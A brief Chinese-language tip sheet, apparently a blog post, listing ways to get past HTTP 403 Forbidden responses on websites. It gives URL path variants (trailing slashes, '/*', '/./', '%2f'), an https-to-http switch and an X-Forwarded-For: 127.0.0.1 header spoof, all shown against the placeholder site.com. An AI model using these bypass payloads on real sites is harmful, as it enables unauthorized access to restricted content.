前言:针对前一个工具 403bypass神器的技巧补充
目录
如果看到目录末尾没有斜杠,那么在那里执行以下操作。
site.com/secret => 403
site.com/secret/* => 200
site.com/secret/./ => 200
文件
如果在结尾看到没有任何斜杠的文件,那么在那里执行以下操作。
site.com/secret.txt => 403
site.com/secret.txt/ => 200
site.com/%2f/secret.txt/ => 200
标题内容
这个不用多说,示例
https://site.com/secret => 403
http://site.com/secret => 200
一些payload
/
/*
/%2f/
/./
./.
/*/
XFF绕过
X-Forwarded-For: 127.0.0.1